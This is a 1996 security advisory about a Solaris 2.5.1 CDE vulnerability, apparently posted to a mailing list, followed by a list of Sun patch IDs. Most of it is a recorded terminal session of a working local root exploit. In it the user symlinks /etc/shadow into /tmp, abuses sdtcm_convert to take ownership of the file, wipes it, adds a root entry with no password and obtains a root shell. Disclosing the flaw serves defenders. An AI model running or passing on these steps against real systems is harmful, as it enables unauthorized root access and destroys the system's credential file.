

    Solaris 2.5.1


    Adam  Morrison   <adam@MATH.TAU.AC.IL>  one   other  hole in

    CDE is generally a can of worms.

        $Id: sdtcm_convert,v 1.1 1996/07/14 17:44:54 adam Exp $

        Script started on Thu Jul 11 22:15:03 1996
        22:15  [wumpus:~] % whoami
        22:15  [wumpus:~] % ls -l /etc/shadow
        -r--------   1 root     sys          291 Jul 11 22:14 /etc/shadow
        22:15  [wumpus:~] % ln -s /etc/shadow /tmp/calorig.adam
        22:15  [wumpus:~] % /usr/dt/bin/sdtcm_convert -d /tmp -v 3 adam
        Loading the calendar ...

        WARNING!! Data  will be  lost when  converting version  4 data
        format back to version 3 data format.

        Do you want to continue? (Y/N) [Y] y

        Doing conversion ...
        Writing out new file ...
        Conversion done successfully.
        Total number of appointments                    = 0
        Number of one-time appointments converted       = 0
        Number of repeating appointments converted      = 0
        Number of one-time appointments pruned          = 0
        Number of repeating appointments pruned         = 0
        The original file is saved in /tmp/calorig.adam
        22:15  [wumpus:~] % ls -l /etc/shadow
        -r--rw----   1 adam     daemon      3114 Jul 11 22:15 /etc/shadow
        22:15  [wumpus:~] % chmod 644 /etc/shadow
        22:15  [wumpus:~] % cp /dev/null /etc/shadow
        cp: overwrite /etc/shadow (y/n)? y
        22:15  [wumpus:~] % ls -l /etc/shadow
        -rw-r--r--   1 adam     daemon         0 Jul 11 22:15 /etc/shadow
        22:15  [wumpus:~] % echo "root::6445::::::" >> /etc/shadow
        22:16  [wumpus:~] % su
        # id
        uid=0(root) gid=1(other)
        # exit


    There is a  set of Sun  patches that corrects  this vulnerability.
    They are:

        103670-02: CDE 1.0.2: sdtcm_convert has a security vulnerability
        103671-02: CDE 1.0.1: sdtcm_convert has a security vulnerability
        103717-02: CDE 1.0.2: sdtcm_convert has a security vulnerability (x86 version)
        103718-02: CDE 1.0.1: sdtcm_convert has a security vulnerability (x86 version)